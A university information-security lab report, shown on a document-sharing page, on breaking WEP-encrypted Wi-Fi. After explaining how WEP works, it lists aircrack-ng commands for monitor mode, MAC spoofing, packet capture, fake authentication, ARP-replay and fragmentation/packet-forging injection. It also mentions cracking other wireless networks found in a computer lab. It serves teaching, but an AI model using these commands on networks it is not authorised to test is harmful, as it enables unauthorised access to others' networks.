无线网络安全实验

  • 格式:doc
  • 大小:403.50 KB
  • 文档页数:11

下载文档原格式

  / 11
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

实验报告

课程名称《信息系统安全技术及应用》实验项目《无线网络安全性研究与实践》实验仪器PC机、因特网

系别信息管理学院

专业信息安全

班级__________________

组长姓名 ________________

组员姓名_ _

_ ___ ____

实验日期 2013-

成绩 _______________________

指导教师刘晓梅

北京信息科技大学信息管理学院

数据

CRC-32算法

数据CRC值

数据+CRC值

加密好数据后,IV会附加到数据上,同时用一个数据位(比特)来表示数据包已被加密。然后,所有信息广播到空中,由接受方捕捉和解密。

解密过程是对加密过程的一个逆转。首先,从数据包中移除IV,并将其与共享密钥合并在一起。然后,合并后的值用于重新创建KSA,后者进而用于创建密钥流(Keystream),密钥流与加密的数据包进行XOR 运算,便得到明文输出。然后,从明文中移除校验和(CRC),并将它与重新计算后所得的CRC进行比较,随后确定对这个数据包的取舍。

2.实验准备(实验环境的搭建、实验仪器的准备等):

本次实验主要涉及了2个实验环境:

一:宿舍的实验环境:为了方便研究无线破解的技术和原理,从安协拿回了无线路由器,在宿舍搭建了一个由TP-LINK 54MB的无线路由组成的用WEB-64比特加密方式加密的无线局域网。

二:机房的实验环境:机房的实验环境不需要自己搭建,有很多现成的无线信号可以供破解,也没有实验仪器需要准备。

3.实验步骤(详细写出实验步骤):

实验准备阶段:

(1)实验装备用具:华硕A8JS(内置Intel3945 无线网卡)配备BT3 U盘操作系统。

IBM T60(内置Intel3945 无线网卡)配备BT3 硬盘操作系统。

(2)调试各种BT3操作系统,使在BT3下能够上网浏览网页,浏览文档,辅助在BT3下的破解工作,且可以正常运行进行破解工作。

实验破解阶段:

(1)在BT3操作系统下:

一种方法:

1.开机运行BT3操作系统,打开一个SHELL命令框,开始输入命令:modprobe –r

iwl3945卸载3945网卡的原驱动,再输入命令:modprobe ipwraw 装载支持监听模式的新驱动。

2.输入命令:airodump-ng wifi0 开始扫描所有的无线信号,以选择破解的目标。

3.输入命令:macchanger –m <本机MAC地址> wifi0 来改变自己网卡的MAC地址,

确保相同。

此步可有可无。故无截图,在此只是点名此步骤。

4.输入命令:airmon-ng start wifi0 6 激活网卡的监听模式并且工作在wifi0所在的第6

5.输入命令:airodump-ng -w capture -c 6 –bssid <所要破解的AP的MAC地址> wifi0

开始按照物理地址和频道所对应的无线信号抓包,并且把所抓到的数据包存

为名字capture的文件。

6.输入命令:aireplay-ng -1 0 -e <所要破解的AP的Essid> -a <所要破解的AP的物理地址>

wifi0

利用BT3系统自带的-1攻击模式对所要破解的无线路由器进行虚连接攻

击,伪造和所要破解AP的伪装连接,为后面的攻击打下基础。

7.输入命令:aireplay-ng -3 –b <所要破解的AP的物理地址> wifi0

利用BT3操作系统自带的arp 注入攻击模式的-3 模式通过不断向AP 发

送同样的arp请求包,来进行注入式攻击,以便获得大量的有效数据。攻击

成功后数据包飞涨。

另一种方法:

1.开机运行BT3操作系统,打开一个SHELL命令框,开始输入命令:modprobe –r

iwl3945卸载3945网卡的原驱动,再输入命令:modprobe ipwraw 装载支持监听模式的新驱动。

2.输入命令:airodump-ng wifi0 开始扫描所有的无线信号,以选择破解的目标。

3.输入命令:macchanger –m <本机MAC地址> wifi0 来改变自己网卡的MAC地址,

确保相同。

此步可有可无。故无截图,在此只是点名此步骤。

4.输入命令:airmon-ng start wifi0 6 激活网卡的监听模式并且工作在wifi0所在的第6

频道。

5.输入命令:airodump-ng -w capture -c 6 –bssid <所要破解的AP的MAC地址> wifi0

开始按照物理地址和频道所对应的无线信号抓包,并且把所抓到的数据包存

为名字是capture的文件。

6.输入命令:aireplay-ng -1 0 -e <所要破解的AP的Essid> -a <所要破解的AP的物理地址>

wifi0

利用BT3系统自带的-1攻击模式对所要破解的无线路由器进行虚连接攻

击,伪造和所要破解AP的伪装连接,为后面的攻击打下基础。

7.输入命令:airreplay-ng -5 –b 001478e51610 wifi0

采用碎片包攻击模式-5,获得一个PRGA数据包(xor文件)。

8.输入命令:packetforge-ng -0 -a -h -k 255.255.255.255 –l

255.255.255.255 –y fragment-0108-231739.xor -w myarp

用数据包制造程序packetforge-ng将上面获得的xor 数据包伪造成可利用的ARP注入包。

9.输入命令:aireplay-ng -2 –r myarp -x 512 wifi0

采用交互模式-2,发包注入攻击。